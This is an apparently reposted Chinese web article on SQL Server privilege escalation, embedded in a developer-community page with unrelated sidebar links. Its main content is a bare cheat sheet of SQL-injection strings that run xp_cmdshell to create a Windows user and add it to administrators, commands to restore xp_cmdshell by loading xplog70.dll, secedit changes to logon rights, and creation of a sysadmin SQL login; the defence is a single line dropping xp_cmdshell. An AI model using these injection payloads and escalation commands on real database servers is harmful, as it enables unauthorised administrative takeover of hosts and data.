AI 助理
备案控制台
开发者社区 数据库 文章 正文

SQL Server提升权限相关命令及防范

2017-11-16 1080
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
本文涉及的产品
云数据库 RDS SQL Server,基础系列 2核4GB
推荐场景:
SQL Server性能诊断案例分析
RDS SQL Server Serverless,2-4RCU 50GB 3个月
推荐场景:
简介:
来源:[url]http://neeao.com[/url]

;exec master..xp_cmdshell "net user name password /add"--
;exec master..xp_cmdshell "net localgroup administrators name /add"--

程序代码开启cmdshell的SQL语句

EXEC sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'

判断存储扩展是否存在
select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

恢复xp_cmdshell
Exec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='X' and name='xp_cmdshell'
返回结果为1就OK

否则上传xplog7.0.dll
Exec master.dbo.addextendedproc 'xp_cmdshell','C:/WinNt/System32/xplog70.dll'

堵上cmdshell的SQL语句
sp_dropextendedproc "xp_cmdshell"


DOS:
dir c:/
dir d:/
dir e:/

net user TsInternetUsers Password /add
net localGroup Administrators TsInternetUsers /add

备份恢复IPSEC

secedit /export /CFG c:/tmp.inf
echo sedenynetworklogonright =>>c:/tmp.inf
secedit /configure /db c:/windows/secedit.sdb /CFG c:/tmp.inf

SQL:
exec master..sp_addlogin UserName,Password

exec master..sp_addsrvrolemember UserName,sysadmin
















本文转自loveme2351CTO博客,原文链接:http://blog.51cto.com/loveme23/8400 ,如需转载请自行联系原作者


文章标签:
云数据库 RDS SQL Server 版
SQL
Windows
存储
关键词:
SQL命令
SQL权限
云数据库RDS SQLServer版权限
SQL server
SQL防范
相关实践学习
使用SQL语句管理索引
本次实验主要介绍如何在RDS-SQLServer数据库中,使用SQL语句管理索引。
SQL Server on Linux入门教程
SQL Server数据库一直只提供Windows下的版本。2016年微软宣布推出可运行在Linux系统下的SQL Server数据库,该版本目前还是早期预览版本。本课程主要介绍SQLServer On Linux的基本知识。 相关的阿里云产品:云数据库RDS SQL Server版 RDS SQL Server不仅拥有高可用架构和任意时间点的数据恢复功能,强力支撑各种企业应用,同时也包含了微软的License费用,减少额外支出。 了解产品详情: https://www.aliyun.com/product/rds/sqlserver
技术小甜
目录
相关文章
1100237741946300
|
1月前
|
SQL 存储 数据库
新建数据集SQL命令详解及技巧
在数据库管理中,新建数据集(即创建新表)是常见的操作之一
1100237741946300
31 4
1100237741946300
|
1月前
|
SQL 安全 关系型数据库
SQL错误代码1303解析与解决方案:深入理解并应对权限问题
在数据库管理和开发过程中,遇到错误代码是常见的事情,每个错误代码都代表着一种特定的问题
1100237741946300
91 0
派大鑫的工作室
|
1月前
|
SQL 安全 关系型数据库
sql注入原理和sqlmap命令的基础命令以及使用手法
sql注入原理和sqlmap命令的基础命令以及使用手法
派大鑫的工作室
47 0
游客j4mujezz7vm7y
|
2月前
|
关系型数据库 MySQL 网络安全
5-10Can't connect to MySQL server on 'sh-cynosl-grp-fcs50xoa.sql.tencentcdb.com' (110)")
5-10Can't connect to MySQL server on 'sh-cynosl-grp-fcs50xoa.sql.tencentcdb.com' (110)")
游客j4mujezz7vm7y
37 0
竹子爱熊猫
|
4月前
|
存储 关系型数据库 MySQL
(十五)MySQL命令大全:以后再也不用担心忘记SQL该怎么写啦~
相信大家在编写SQL时一定有一个困扰,就是明明记得数据库中有个命令/函数,可以实现自己需要的功能,但偏偏不记得哪个命令该怎么写了,这时只能靠盲目的去百度,以此来寻找自己需要的命令。
竹子爱熊猫
167 28
嘟嘟嘟嘟嘟嘟
|
3月前
|
SQL 分布式计算 DataWorks
DataWorks操作报错合集之使用sql查询报错无权限,是什么原因
DataWorks是阿里云提供的一站式大数据开发与治理平台,支持数据集成、数据开发、数据服务、数据质量管理、数据安全管理等全流程数据处理。在使用DataWorks过程中,可能会遇到各种操作报错。以下是一些常见的报错情况及其可能的原因和解决方法。
嘟嘟嘟嘟嘟嘟
57 1
wljslmz
|
3月前
|
SQL 数据库 开发者
深入理解SQL中的ALIAS命令
【8月更文挑战第31天】
wljslmz
85 0
wljslmz
|
3月前
|
SQL 存储 关系型数据库
详解 SQL 中的 UNION、MINUS 和 INTERSECT 命令
【8月更文挑战第31天】
wljslmz
154 0
sunrr
|
4月前
|
SQL 存储 监控
SQL Server的并行实施如何优化?
【7月更文挑战第23天】SQL Server的并行实施如何优化?
sunrr
115 13
小王老师呀
|
4月前
|
SQL
解锁 SQL Server 2022的时间序列数据功能
【7月更文挑战第14天】要解锁SQL Server 2022的时间序列数据功能,可使用`generate_series`函数生成整数序列,例如:`SELECT value FROM generate_series(1, 10)。此外,`date_bucket`函数能按指定间隔(如周)对日期时间值分组,这些工具结合窗口函数和其他时间日期函数,能高效处理和分析时间序列数据。更多信息请参考官方文档和技术资料。
小王老师呀
76 9

热门文章

最新文章

  • 1
    SQL0286N. DB2表空间的pagesize问题
  • 2
    B+树查询上下级(sql实现)
  • 3
    sql语句查询数据库表结构信息
  • 4
    扩展Exception,增加判断Exception是否为SQL引用约束异常方法!
  • 5
    SQL中几个快速定位语句
  • 6
    SQL Server 索引列的顺序——真的没关系吗
  • 7
    SQLServer 使用 @@ERROR
  • 8
    利用Command创建执行SQL语句的模块
  • 9
    HMS v1.0 appointment.php editid参数 SQL注入漏洞(CVE-2022-25491)
  • 10
    PL/SQL块结构和组成元素
  • 1
    实时计算 Flink版产品使用合集之flink-connector-mysql-cdc 和 flink-connector-sqlserver-cdc 这两个CDC连接器只能选择其中一个使用吗
    186
  • 2
    实时计算 Flink版产品使用合集之当 SQL Server 源数据库中的数据更新后,CDC 吐出的操作(op)是怎样的
    66
  • 3
    sqlserver------数据库的存储过程(练习)
    55
  • 4
    sqlserver数据库学习感悟(1)----关于group by
    47
  • 5
    sqlserver练习----涉及多个表的连接查询
    48
  • 6
    数据库sqlserver-----触发器的插入,更新和删除
    587
  • 7
    SQL Server的版本
    76
  • 8
    Microsoft SQL Server 是微软公司开发的一款关系型数据库管理系统
    102
  • 9
    如何查看SQLSERVER的版本信息和SP补丁信息
    268
  • 10
    安装SQL Server 2005时出现对性能监视器计数器注册表值执行系统配置检查失败的解决办法...
    53

    • 相关课程

    更多
  • 如何在 PolarDB-X 中优化慢 SQL
  • SQL完全自学手册
  • SQL Server on Linux入门教程
  • SQL入门与实践
  • 数据库及SQL/MySQL基础
  • SQL进阶及查询

    • 相关电子书

    更多
  • SQL Server在电子商务中的应用与实践
  • GeoMesa on Spark SQL
  • 原生SQL on Hadoop引擎- Apache HAWQ 2.x最新技术解密malili

    • 相关实验场景

    更多
  • PolarDB for AI:在数据库中通过SQL实现AI能力
  • 玩转MaxCompute SQL! 30分钟搞定数据分析挖掘
  • 使用SQL语句实现数据表管理
  • 使用SQL语句实现数据插入、修改和删除操作
  • 使用SQL语句实现数据查询操作
  • 使用SQL语句管理索引
    • 下一篇
    无影云桌面